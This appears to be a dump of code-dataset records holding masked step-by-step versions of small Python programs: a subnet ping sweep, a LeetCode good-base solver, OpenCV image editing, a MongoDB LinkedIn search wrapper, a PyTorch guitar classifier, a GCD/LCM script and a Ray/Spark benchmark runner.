"step-3": "<mask token>\nip_net = ipaddress.ip_network('192.168.0.100/30')\nfor i in ip_net.hosts():\n host_add = str(i)\n toping = subprocess.Popen(['ping', '-n', '3', host_add], stdout=PIPE)\n output = toping.communicate()[0]\n hostalive = toping.returncode\n if hostalive == 0:\n print(host_add, 'is reachable')\n else:\n print(host_add, 'is not reachable')\n",
"step-4": "import ipaddress\nimport subprocess\nfrom subprocess import Popen, PIPE\nimport time\nip_net = ipaddress.ip_network('192.168.0.100/30')\nfor i in ip_net.hosts():\n host_add = str(i)\n toping = subprocess.Popen(['ping', '-n', '3', host_add], stdout=PIPE)\n output = toping.communicate()[0]\n hostalive = toping.returncode\n if hostalive == 0:\n print(host_add, 'is reachable')\n else:\n print(host_add, 'is not reachable')\n",
"step-5": "import ipaddress\r\nimport subprocess\r\nfrom subprocess import Popen, PIPE\r\nimport time\r\n\r\nip_net = ipaddress.ip_network('192.168.0.100/30')\r\nfor i in ip_net.hosts():\r\n # print(i)\r\n host_add = str(i)\r\n toping = subprocess.Popen(['ping', '-n', '3',host_add],stdout=PIPE)\r\n\r\n output = toping.communicate()[0]\r\n hostalive = toping.returncode\r\n if hostalive == 0:\r\n print(host_add,\"is reachable\")\r\n else:\r\n print(host_add,\"is not reachable\")\r\n # print(output)\r\n # time.sleep(3)\r\n # if toping ==0:\r\n # print(i, ' is alive')\r\n # else:\r\n # print(i,' is not alive')\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import math


class Solution(object):
    def smallestGoodBase(self, n):
        """
        :type n: str
        :rtype: str
        """
        # A good base k represents n as m ones:
        #   (k**m - 1) / (k - 1) = n,  i.e.  m = log_k(n*k - n + 1)
        # m must be an integer, and m is largest when k = 2.
        m_max = int(math.ceil(math.log(1 + int(n), 2)))
        for m in range(m_max, 1, -1):
            # Solve k**m - n*k + n - 1 = 0 for an integer k (binary search)
            res = self.solve_equation(m, int(n))
            if res != False:
                return str(res)

    # Binary search for an integer root k of k**m - n*k + n - 1 = 0.
    # (As the original author notes, it is not obvious the left-hand side is
    # monotonic over the whole range, but the search works for this problem.)
    def solve_equation(self, m, n):
        k_l, k_h = 2, n - 1
        while k_l <= k_h:
            mid = (k_l + k_h) // 2  # integer midpoint (Python 3 safe)
            val = mid ** m - n * mid + n - 1
            if val == 0:
                return mid
            elif val < 0:
                k_l = mid + 1
            else:
                k_h = mid - 1
        return False
|
normal
|
{
"blob_id": "de287d1bc644fdfd0f47bd8667580786b74444d0",
"index": 8863,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n <mask token>\n",
"step-3": "class Solution(object):\n <mask token>\n\n def solve_equation(self, m, n):\n k_l, k_h = 2, n - 1\n while k_l <= k_h:\n mid = (k_l + k_h) / 2\n val = mid ** m - n * mid + n - 1\n if val == 0:\n return mid\n elif val < 0:\n k_l = mid + 1\n else:\n k_h = mid - 1\n return False\n",
"step-4": "class Solution(object):\n\n def smallestGoodBase(self, n):\n \"\"\"\n :type n: str\n :rtype: str\n \"\"\"\n m_max = int(math.ceil(math.log(1 + int(n), 2)))\n for m in range(m_max, 1, -1):\n res = self.solve_equation(m, int(n))\n if res != False:\n return str(res)\n\n def solve_equation(self, m, n):\n k_l, k_h = 2, n - 1\n while k_l <= k_h:\n mid = (k_l + k_h) / 2\n val = mid ** m - n * mid + n - 1\n if val == 0:\n return mid\n elif val < 0:\n k_l = mid + 1\n else:\n k_h = mid - 1\n return False\n",
"step-5": "class Solution(object):\n def smallestGoodBase(self, n):\n \"\"\"\n :type n: str\n :rtype: str\n \"\"\"\n # k is the base and the representation is\n # m bits of 1\n # We then have from math\n # (k**m - 1) / (k-1) = n\n # m = log_k (n * k - n + 1)\n # m needs to be integer\n \n # we know that k = 2 m will be largest\n m_max = int(math.ceil(math.log(1 + int(n), 2)))\n for m in range(m_max, 1, -1):\n # solve high order equation\n # k**m - nk + n - 1 = 0\n \n # Find k using newton approach\n res = self.solve_equation(m, int(n))\n if res != False:\n return str(res)\n \n\n # k**m - nk + n - 1 = 0\n # TODO: Why newton approach always work here.\n # Hard to prove they are always monotonic\n def solve_equation(self, m, n):\n k_l, k_h = 2, n - 1\n while k_l <= k_h:\n mid = (k_l + k_h) / 2\n val = mid ** m - n * mid + n - 1 \n if val == 0:\n return mid\n elif val < 0:\n k_l = mid + 1\n else:\n k_h = mid - 1\n return False\n \n\n ",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
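A quick sanity check of the search above (assuming the integer-midpoint version under Python 3): for n = 13 the answer is base 3, since 13 is 111 in base 3 (9 + 3 + 1); for n = 15 it is base 2 (1111).

s = Solution()
print(s.smallestGoodBase("13"))    # expected "3"  -> 13 == 9 + 3 + 1
print(s.smallestGoodBase("15"))    # expected "2"  -> 15 == 0b1111
print(s.smallestGoodBase("4681"))  # expected "8"  -> 4681 == 11111 in base 8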
import random
import cv2
img = cv2.imread('assets/logo.jpg', -1)
print(img.shape) #3 channels, bgr
#look at the 257. row and pixel 400 --> has bgr values: [41 98 243]
print(img[257][400])
'''
# manipulate the first 100 rows, all columns, and randomize the 3 pixel values
# (rows, colums, pixels) where pixels: b,g,r
for i in range(100): #first 100 rows
for j in range(img.shape[1]): #all the colums
img[i][j] = [random.randint(0,255),random.randint(0,255),random.randint(0,255)]
cv2.imshow('modifiedImage', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
'''
#copy one part of the image and copy it somewhere else
#take the pixels from row 500 bis 700 und davon die colums 600:900
tag = img[500:700, 600:900] #part of the picture
#paste this on another location in the image; needs same dimeension/ size
img[100:300, 650:950] = tag
cv2.imshow('Image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "35e66e5e154f5cd70f187a1cde33cef71102e1a6",
"index": 6829,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(img.shape)\nprint(img[257][400])\n<mask token>\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n",
"step-3": "<mask token>\nimg = cv2.imread('assets/logo.jpg', -1)\nprint(img.shape)\nprint(img[257][400])\n<mask token>\ntag = img[500:700, 600:900]\nimg[100:300, 650:950] = tag\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n",
"step-4": "import random\nimport cv2\nimg = cv2.imread('assets/logo.jpg', -1)\nprint(img.shape)\nprint(img[257][400])\n<mask token>\ntag = img[500:700, 600:900]\nimg[100:300, 650:950] = tag\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n",
"step-5": "import random\nimport cv2\n\nimg = cv2.imread('assets/logo.jpg', -1)\nprint(img.shape) #3 channels, bgr\n\n#look at the 257. row and pixel 400 --> has bgr values: [41 98 243]\nprint(img[257][400])\n\n'''\n# manipulate the first 100 rows, all columns, and randomize the 3 pixel values\n# (rows, colums, pixels) where pixels: b,g,r\nfor i in range(100): #first 100 rows\n for j in range(img.shape[1]): #all the colums\n img[i][j] = [random.randint(0,255),random.randint(0,255),random.randint(0,255)]\n\ncv2.imshow('modifiedImage', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n'''\n\n#copy one part of the image and copy it somewhere else\n#take the pixels from row 500 bis 700 und davon die colums 600:900\ntag = img[500:700, 600:900] #part of the picture\n\n#paste this on another location in the image; needs same dimeension/ size\nimg[100:300, 650:950] = tag\n\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pymongo import MongoClient
from modules.linkedinSearch import SearchClass
from config import Config
class LinkedinSearch:
def __init__(self):
self.client = MongoClient(Config.MONGO_URI)
db = self.client.linkedin_db
self.collection = db.search
self.dict = {}
self.obj = SearchClass()
    def db_check(self, query):
        r = self.obj.search(query)
        print(r)
        t = 0
        for i in r['results']:
            if self.collection.find_one({'userid': i['userid']}):
                pass
            else:
                t += 1
                self.collection.insert_one(i)
        self.client.close()
        print('no. of stored pages', t)

        results = self.db_fetch(query)
        return {'data': results}

    # ------------- fetch all pages matching the query from the database -------------
    def db_fetch(self, query):
        self.collection.create_index([("name", "text")])

        lst = []
        cursor = self.collection.find(
            {"$text": {"$search": query}},
            {'score': {'$meta': "textScore"}}).sort([('score', {'$meta': "textScore"})])
        # cursor.count() is deprecated/removed in newer PyMongo and the value was
        # unused, so just collect the matching documents.
        for i in cursor:
            i.pop('_id')
            lst.append(i)

        print('fetched pages from db', len(lst))
        return lst
if __name__ == '__main__':
obj = LinkedinSearch()
print(obj.db_check("mark"))
|
normal
|
{
"blob_id": "3e8860c22ff3092304df57aa7f5dbcb6ccda7dd8",
"index": 5249,
"step-1": "<mask token>\n\n\nclass LinkedinSearch:\n <mask token>\n <mask token>\n\n def db_fetch(self, query):\n self.collection.create_index([('name', 'text')])\n lst = []\n cursor = self.collection.find({'$text': {'$search': query}}, {\n 'score': {'$meta': 'textScore'}}).sort([('score', {'$meta':\n 'textScore'})])\n total = cursor.count()\n n = 0\n for i in cursor:\n i.pop('_id')\n lst.append(i)\n n += 1\n print('fetched pages from db', len(lst))\n return lst\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass LinkedinSearch:\n\n def __init__(self):\n self.client = MongoClient(Config.MONGO_URI)\n db = self.client.linkedin_db\n self.collection = db.search\n self.dict = {}\n self.obj = SearchClass()\n\n def db_check(self, query):\n r = self.obj.search(query)\n print(r)\n t = 0\n for i in r['results']:\n if self.collection.find_one({'userid': i['userid']}):\n pass\n else:\n t += 1\n self.collection.insert_one(i)\n self.client.close()\n print('no. of stored pages', t)\n results = self.db_fetch(query)\n return {'data': results}\n\n def db_fetch(self, query):\n self.collection.create_index([('name', 'text')])\n lst = []\n cursor = self.collection.find({'$text': {'$search': query}}, {\n 'score': {'$meta': 'textScore'}}).sort([('score', {'$meta':\n 'textScore'})])\n total = cursor.count()\n n = 0\n for i in cursor:\n i.pop('_id')\n lst.append(i)\n n += 1\n print('fetched pages from db', len(lst))\n return lst\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass LinkedinSearch:\n\n def __init__(self):\n self.client = MongoClient(Config.MONGO_URI)\n db = self.client.linkedin_db\n self.collection = db.search\n self.dict = {}\n self.obj = SearchClass()\n\n def db_check(self, query):\n r = self.obj.search(query)\n print(r)\n t = 0\n for i in r['results']:\n if self.collection.find_one({'userid': i['userid']}):\n pass\n else:\n t += 1\n self.collection.insert_one(i)\n self.client.close()\n print('no. of stored pages', t)\n results = self.db_fetch(query)\n return {'data': results}\n\n def db_fetch(self, query):\n self.collection.create_index([('name', 'text')])\n lst = []\n cursor = self.collection.find({'$text': {'$search': query}}, {\n 'score': {'$meta': 'textScore'}}).sort([('score', {'$meta':\n 'textScore'})])\n total = cursor.count()\n n = 0\n for i in cursor:\n i.pop('_id')\n lst.append(i)\n n += 1\n print('fetched pages from db', len(lst))\n return lst\n\n\nif __name__ == '__main__':\n obj = LinkedinSearch()\n print(obj.db_check('mark'))\n",
"step-4": "from pymongo import MongoClient\nfrom modules.linkedinSearch import SearchClass\nfrom config import Config\n\n\nclass LinkedinSearch:\n\n def __init__(self):\n self.client = MongoClient(Config.MONGO_URI)\n db = self.client.linkedin_db\n self.collection = db.search\n self.dict = {}\n self.obj = SearchClass()\n\n def db_check(self, query):\n r = self.obj.search(query)\n print(r)\n t = 0\n for i in r['results']:\n if self.collection.find_one({'userid': i['userid']}):\n pass\n else:\n t += 1\n self.collection.insert_one(i)\n self.client.close()\n print('no. of stored pages', t)\n results = self.db_fetch(query)\n return {'data': results}\n\n def db_fetch(self, query):\n self.collection.create_index([('name', 'text')])\n lst = []\n cursor = self.collection.find({'$text': {'$search': query}}, {\n 'score': {'$meta': 'textScore'}}).sort([('score', {'$meta':\n 'textScore'})])\n total = cursor.count()\n n = 0\n for i in cursor:\n i.pop('_id')\n lst.append(i)\n n += 1\n print('fetched pages from db', len(lst))\n return lst\n\n\nif __name__ == '__main__':\n obj = LinkedinSearch()\n print(obj.db_check('mark'))\n",
"step-5": "from pymongo import MongoClient\nfrom modules.linkedinSearch import SearchClass\nfrom config import Config\n\n\nclass LinkedinSearch:\n\n def __init__(self):\n\n self.client = MongoClient(Config.MONGO_URI)\n db = self.client.linkedin_db\n self.collection = db.search\n self.dict = {}\n self.obj = SearchClass()\n\n def db_check(self, query):\n\n r = self.obj.search(query)\n print(r)\n t = 0\n for i in r['results']:\n if self.collection.find_one({'userid': i['userid']}):\n pass\n else:\n # print(i)\n t += 1\n self.collection.insert_one(i)\n self.client.close()\n print('no. of stored pages', t)\n # self.loop.close()\n\n results = self.db_fetch(query)\n #\n # # return {'results': m}\n return {'data': results}\n\n # ---------------------fetching total number of query pages from database----------------------------------------\n def db_fetch(self, query):\n self.collection.create_index([(\"name\", \"text\")])\n\n lst = []\n cursor = self.collection.find(\n {\"$text\": {\"$search\": query}},\n {'score': {'$meta': \"textScore\"}}).sort([('score', {'$meta': \"textScore\"})])\n total = cursor.count()\n n = 0\n for i in cursor:\n # print(i)\n i.pop('_id')\n lst.append(i)\n n += 1\n\n print('fetched pages from db', len(lst))\n # return {'results': lst,\n # 'total': n}\n return lst\n\n\nif __name__ == '__main__':\n obj = LinkedinSearch()\n print(obj.db_check(\"mark\"))\n\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
import torch
from torchvision import datasets, transforms
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
from PIL import Image
import requests
from io import BytesIO
from net import Net
class predict_guitar():
def __init__(self):
"""Model is loaded on init of the class"""
self.model = Net()
if torch.cuda.is_available():
map_location=torch.device('cuda')
else:
map_location=torch.device('cpu')
# load parameters
self.model.load_state_dict(torch.load('model.pt',
map_location=map_location))
if torch.cuda.is_available():
self.model.cuda()
else:
self.model.cpu()
self.model.eval()
def softmax(self, vector):
"""Softmax function for calculating probs"""
e = np.exp(vector)
return e / e.sum()
def predict(self,url):
"""Generating prediction of image url"""
# get image
response = requests.get(url)
img = Image.open(BytesIO(response.content))
transform = transforms.Compose([transforms.Grayscale(),
transforms.Resize((128,128)),
transforms.ToTensor()])
img = transform(img).unsqueeze(0)
if torch.cuda.is_available():
img = img.cuda()
out = self.model(img)
classes = ['Jazzmaster','Les Paul', 'Mustang', 'PRS SE', 'SG',
'Stratocaster','Telecaster']
if torch.cuda.is_available():
logs = out.cpu().data.numpy()
else:
logs = out.data.numpy()
return [classes[logs.argmax()]]
|
normal
|
{
"blob_id": "8743be809953f59bd14431e509042c4c51d9fab4",
"index": 4175,
"step-1": "<mask token>\n\n\nclass predict_guitar:\n <mask token>\n\n def softmax(self, vector):\n \"\"\"Softmax function for calculating probs\"\"\"\n e = np.exp(vector)\n return e / e.sum()\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass predict_guitar:\n <mask token>\n\n def softmax(self, vector):\n \"\"\"Softmax function for calculating probs\"\"\"\n e = np.exp(vector)\n return e / e.sum()\n\n def predict(self, url):\n \"\"\"Generating prediction of image url\"\"\"\n response = requests.get(url)\n img = Image.open(BytesIO(response.content))\n transform = transforms.Compose([transforms.Grayscale(), transforms.\n Resize((128, 128)), transforms.ToTensor()])\n img = transform(img).unsqueeze(0)\n if torch.cuda.is_available():\n img = img.cuda()\n out = self.model(img)\n classes = ['Jazzmaster', 'Les Paul', 'Mustang', 'PRS SE', 'SG',\n 'Stratocaster', 'Telecaster']\n if torch.cuda.is_available():\n logs = out.cpu().data.numpy()\n else:\n logs = out.data.numpy()\n return [classes[logs.argmax()]]\n",
"step-3": "<mask token>\n\n\nclass predict_guitar:\n\n def __init__(self):\n \"\"\"Model is loaded on init of the class\"\"\"\n self.model = Net()\n if torch.cuda.is_available():\n map_location = torch.device('cuda')\n else:\n map_location = torch.device('cpu')\n self.model.load_state_dict(torch.load('model.pt', map_location=\n map_location))\n if torch.cuda.is_available():\n self.model.cuda()\n else:\n self.model.cpu()\n self.model.eval()\n\n def softmax(self, vector):\n \"\"\"Softmax function for calculating probs\"\"\"\n e = np.exp(vector)\n return e / e.sum()\n\n def predict(self, url):\n \"\"\"Generating prediction of image url\"\"\"\n response = requests.get(url)\n img = Image.open(BytesIO(response.content))\n transform = transforms.Compose([transforms.Grayscale(), transforms.\n Resize((128, 128)), transforms.ToTensor()])\n img = transform(img).unsqueeze(0)\n if torch.cuda.is_available():\n img = img.cuda()\n out = self.model(img)\n classes = ['Jazzmaster', 'Les Paul', 'Mustang', 'PRS SE', 'SG',\n 'Stratocaster', 'Telecaster']\n if torch.cuda.is_available():\n logs = out.cpu().data.numpy()\n else:\n logs = out.data.numpy()\n return [classes[logs.argmax()]]\n",
"step-4": "import torch\nfrom torchvision import datasets, transforms\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\nfrom net import Net\n\n\nclass predict_guitar:\n\n def __init__(self):\n \"\"\"Model is loaded on init of the class\"\"\"\n self.model = Net()\n if torch.cuda.is_available():\n map_location = torch.device('cuda')\n else:\n map_location = torch.device('cpu')\n self.model.load_state_dict(torch.load('model.pt', map_location=\n map_location))\n if torch.cuda.is_available():\n self.model.cuda()\n else:\n self.model.cpu()\n self.model.eval()\n\n def softmax(self, vector):\n \"\"\"Softmax function for calculating probs\"\"\"\n e = np.exp(vector)\n return e / e.sum()\n\n def predict(self, url):\n \"\"\"Generating prediction of image url\"\"\"\n response = requests.get(url)\n img = Image.open(BytesIO(response.content))\n transform = transforms.Compose([transforms.Grayscale(), transforms.\n Resize((128, 128)), transforms.ToTensor()])\n img = transform(img).unsqueeze(0)\n if torch.cuda.is_available():\n img = img.cuda()\n out = self.model(img)\n classes = ['Jazzmaster', 'Les Paul', 'Mustang', 'PRS SE', 'SG',\n 'Stratocaster', 'Telecaster']\n if torch.cuda.is_available():\n logs = out.cpu().data.numpy()\n else:\n logs = out.data.numpy()\n return [classes[logs.argmax()]]\n",
"step-5": "import torch\nfrom torchvision import datasets, transforms\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\nfrom net import Net\n\nclass predict_guitar():\n\n def __init__(self):\n \"\"\"Model is loaded on init of the class\"\"\"\n \n self.model = Net()\n\n if torch.cuda.is_available():\n map_location=torch.device('cuda')\n else:\n map_location=torch.device('cpu')\n\n # load parameters\n self.model.load_state_dict(torch.load('model.pt',\n map_location=map_location)) \n \n if torch.cuda.is_available():\n self.model.cuda()\n else:\n self.model.cpu()\n \n self.model.eval()\n\n def softmax(self, vector):\n \"\"\"Softmax function for calculating probs\"\"\"\n e = np.exp(vector)\n return e / e.sum()\n\n def predict(self,url):\n \"\"\"Generating prediction of image url\"\"\"\n\n # get image\n response = requests.get(url)\n \n img = Image.open(BytesIO(response.content))\n\n transform = transforms.Compose([transforms.Grayscale(),\n transforms.Resize((128,128)),\n transforms.ToTensor()])\n\n img = transform(img).unsqueeze(0)\n\n if torch.cuda.is_available(): \n img = img.cuda() \n\n out = self.model(img)\n\n classes = ['Jazzmaster','Les Paul', 'Mustang', 'PRS SE', 'SG',\n 'Stratocaster','Telecaster']\n\n if torch.cuda.is_available():\n\n logs = out.cpu().data.numpy()\n \n else:\n\n logs = out.data.numpy()\n \n return [classes[logs.argmax()]]\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def gcd_naive(a, b):
x = 5
while x > 1:
if a % b != 0:
c = a % b
a = b
b = c
else:
x = 1
return b
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gcd_naive(a, b):
x = 5
while x > 1:
if a % b != 0:
c = a % b
a = b
b = c
else:
x = 1
return b
<|reserved_special_token_0|>
if factor > 1:
multiple = Decimal(a) * Decimal(b) / Decimal(factor)
else:
multiple = Decimal(a * b)
print(int(multiple))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gcd_naive(a, b):
x = 5
while x > 1:
if a % b != 0:
c = a % b
a = b
b = c
else:
x = 1
return b
there = input()
store = there.split()
a = int(max(store))
b = int(min(store))
factor = gcd_naive(a, b)
if factor > 1:
multiple = Decimal(a) * Decimal(b) / Decimal(factor)
else:
multiple = Decimal(a * b)
print(int(multiple))
<|reserved_special_token_1|>
from decimal import Decimal
def gcd_naive(a, b):
x = 5
while x > 1:
if a % b != 0:
c = a % b
a = b
b = c
else:
x = 1
return b
there = input()
store = there.split()
a = int(max(store))
b = int(min(store))
factor = gcd_naive(a, b)
if factor > 1:
multiple = Decimal(a) * Decimal(b) / Decimal(factor)
else:
multiple = Decimal(a * b)
print(int(multiple))
<|reserved_special_token_1|>
# Uses python3
from decimal import Decimal
def gcd_naive(a, b):
x = 5
while x > 1:
if a % b != 0:
c = a % b
a = b
b = c
else:
x = 1
return b
there = input()
store = there.split()
a = int(max(store))
b = int(min(store))
factor = gcd_naive(a,b)
if factor > 1:
multiple = (Decimal(a) * Decimal(b)) / Decimal(factor)
else:
multiple = Decimal(a * b)
print(int(multiple))
|
flexible
|
{
"blob_id": "c70681f5ff8d49a243b7d26164aa5430739354f4",
"index": 6936,
"step-1": "<mask token>\n\n\ndef gcd_naive(a, b):\n x = 5\n while x > 1:\n if a % b != 0:\n c = a % b\n a = b\n b = c\n else:\n x = 1\n return b\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gcd_naive(a, b):\n x = 5\n while x > 1:\n if a % b != 0:\n c = a % b\n a = b\n b = c\n else:\n x = 1\n return b\n\n\n<mask token>\nif factor > 1:\n multiple = Decimal(a) * Decimal(b) / Decimal(factor)\nelse:\n multiple = Decimal(a * b)\nprint(int(multiple))\n",
"step-3": "<mask token>\n\n\ndef gcd_naive(a, b):\n x = 5\n while x > 1:\n if a % b != 0:\n c = a % b\n a = b\n b = c\n else:\n x = 1\n return b\n\n\nthere = input()\nstore = there.split()\na = int(max(store))\nb = int(min(store))\nfactor = gcd_naive(a, b)\nif factor > 1:\n multiple = Decimal(a) * Decimal(b) / Decimal(factor)\nelse:\n multiple = Decimal(a * b)\nprint(int(multiple))\n",
"step-4": "from decimal import Decimal\n\n\ndef gcd_naive(a, b):\n x = 5\n while x > 1:\n if a % b != 0:\n c = a % b\n a = b\n b = c\n else:\n x = 1\n return b\n\n\nthere = input()\nstore = there.split()\na = int(max(store))\nb = int(min(store))\nfactor = gcd_naive(a, b)\nif factor > 1:\n multiple = Decimal(a) * Decimal(b) / Decimal(factor)\nelse:\n multiple = Decimal(a * b)\nprint(int(multiple))\n",
"step-5": "# Uses python3\nfrom decimal import Decimal\ndef gcd_naive(a, b):\n x = 5\n while x > 1:\n if a % b != 0:\n c = a % b\n a = b\n b = c\n else:\n x = 1\n return b\n\nthere = input()\nstore = there.split()\na = int(max(store))\nb = int(min(store))\nfactor = gcd_naive(a,b)\nif factor > 1:\n multiple = (Decimal(a) * Decimal(b)) / Decimal(factor)\nelse:\n multiple = Decimal(a * b)\n\nprint(int(multiple))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@ray.remote
def run(run_config: dict, wrks: dict) ->dict:
try:
add_spk_role()
except:
print('run, spark: ignore')
os.chdir(microps_dir)
base_spk_config = spk.apps_config_map['sparkperfml']
base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':
run_config['appName'], 'ins_type': run_config['serverInstanceType'],
'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':
run_config['driverAdaptiveGC']})
bench = None
for b in SparkBenchMaker.load_benchmarks():
if b['name'] == run_config['appName']:
bench = b
if bench is None:
print('run, spark: unable to find bench', run_config['appName'])
config_base = SparkBenchMaker.load_base()
utils.update_bench_params(base=config_base, bench=bench, key=
'numExamples', value=run_config['inputScale'], is_scale=True)
utils.update_bench_params(base=config_base, bench=bench, key=
'numPartitions', value=run_config['numPartition'], is_scale=False)
utils.update_bench_params(base=config_base, bench=bench, key=
'randomSeed', value=random.randint(0, 10000) if run_config.get(
'randomSeed', 1) == 'random' else 1, is_scale=False)
bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [
bench]})
print(bc)
exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {
's3_log_bucket': run_config['logBucket'], 'num_executor':
run_config['numExecutor'], 'ins_type': run_config[
'serverInstanceType'], 'ins_num': run_config['numServerInstance'],
'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':
[(run_config['serverInstanceType'], run_config['numServerInstance']
)], 'variables': {}})
exp.run()
return {}
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path += [perfd_dir, microps_dir]
<|reserved_special_token_0|>
@ray.remote
def run(run_config: dict, wrks: dict) ->dict:
try:
add_spk_role()
except:
print('run, spark: ignore')
os.chdir(microps_dir)
base_spk_config = spk.apps_config_map['sparkperfml']
base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':
run_config['appName'], 'ins_type': run_config['serverInstanceType'],
'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':
run_config['driverAdaptiveGC']})
bench = None
for b in SparkBenchMaker.load_benchmarks():
if b['name'] == run_config['appName']:
bench = b
if bench is None:
print('run, spark: unable to find bench', run_config['appName'])
config_base = SparkBenchMaker.load_base()
utils.update_bench_params(base=config_base, bench=bench, key=
'numExamples', value=run_config['inputScale'], is_scale=True)
utils.update_bench_params(base=config_base, bench=bench, key=
'numPartitions', value=run_config['numPartition'], is_scale=False)
utils.update_bench_params(base=config_base, bench=bench, key=
'randomSeed', value=random.randint(0, 10000) if run_config.get(
'randomSeed', 1) == 'random' else 1, is_scale=False)
bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [
bench]})
print(bc)
exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {
's3_log_bucket': run_config['logBucket'], 'num_executor':
run_config['numExecutor'], 'ins_type': run_config[
'serverInstanceType'], 'ins_num': run_config['numServerInstance'],
'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':
[(run_config['serverInstanceType'], run_config['numServerInstance']
)], 'variables': {}})
exp.run()
return {}
<|reserved_special_token_1|>
<|reserved_special_token_0|>
path_join = os.path.join
real_path = os.path.realpath
perfd_dir = real_path(path_join(os.getcwd()))
microps_dir = path_join(perfd_dir, 'thirdparty', 'microps')
sys.path += [perfd_dir, microps_dir]
<|reserved_special_token_0|>
@ray.remote
def run(run_config: dict, wrks: dict) ->dict:
try:
add_spk_role()
except:
print('run, spark: ignore')
os.chdir(microps_dir)
base_spk_config = spk.apps_config_map['sparkperfml']
base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':
run_config['appName'], 'ins_type': run_config['serverInstanceType'],
'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':
run_config['driverAdaptiveGC']})
bench = None
for b in SparkBenchMaker.load_benchmarks():
if b['name'] == run_config['appName']:
bench = b
if bench is None:
print('run, spark: unable to find bench', run_config['appName'])
config_base = SparkBenchMaker.load_base()
utils.update_bench_params(base=config_base, bench=bench, key=
'numExamples', value=run_config['inputScale'], is_scale=True)
utils.update_bench_params(base=config_base, bench=bench, key=
'numPartitions', value=run_config['numPartition'], is_scale=False)
utils.update_bench_params(base=config_base, bench=bench, key=
'randomSeed', value=random.randint(0, 10000) if run_config.get(
'randomSeed', 1) == 'random' else 1, is_scale=False)
bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [
bench]})
print(bc)
exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {
's3_log_bucket': run_config['logBucket'], 'num_executor':
run_config['numExecutor'], 'ins_type': run_config[
'serverInstanceType'], 'ins_num': run_config['numServerInstance'],
'run_interval': 0.5, 'runs': 1, 'bench_config': bc}, 'ins_type_num':
[(run_config['serverInstanceType'], run_config['numServerInstance']
)], 'variables': {}})
exp.run()
return {}
<|reserved_special_token_1|>
import ray
import os
import sys
import random
path_join = os.path.join
real_path = os.path.realpath
perfd_dir = real_path(path_join(os.getcwd()))
microps_dir = path_join(perfd_dir, 'thirdparty', 'microps')
sys.path += [perfd_dir, microps_dir]
from thirdparty.microps.oracle.experiments.spark_sql_perf.main import SparkExperiment, SparkBenchMaker
from thirdparty.microps.build.spark.driver import add_role as add_spk_role
import thirdparty.microps.oracle.apps.spark_sql_perf.configs as spk
import thirdparty.microps.oracle.experiments.spark_sql_perf.utils as utils
@ray.remote
def run(run_config: dict, wrks: dict) ->dict:
try:
add_spk_role()
except:
print('run, spark: ignore')
os.chdir(microps_dir)
base_spk_config = spk.apps_config_map['sparkperfml']
base_spk_config = spk.patched_app_config(base_spk_config, {'app_name':
run_config['appName'], 'ins_type': run_config['serverInstanceType'],
'ins_num': run_config['numExecutor'] + 1, 'driver_adaptive_gc':
run_config['driverAdaptiveGC']})
bench = None
for b in SparkBenchMaker.load_benchmarks():
if b['name'] == run_config['appName']:
bench = b
if bench is None:
print('run, spark: unable to find bench', run_config['appName'])
config_base = SparkBenchMaker.load_base()
utils.update_bench_params(base=config_base, bench=bench, key=
'numExamples', value=run_config['inputScale'], is_scale=True)
utils.update_bench_params(base=config_base, bench=bench, key=
'numPartitions', value=run_config['numPartition'], is_scale=False)
utils.update_bench_params(base=config_base, bench=bench, key=
'randomSeed', value=random.randint(0, 10000) if run_config.get(
'randomSeed', 1) == 'random' else 1, is_scale=False)
bc = SparkBenchMaker.patched_bench_config(config_base, {'benchmarks': [
bench]})
print(bc)
exp = SparkExperiment({'app_configs': base_spk_config, 'exp_configs': {
's3_log_bucket': run_config['logBucket'], 'num_executor':
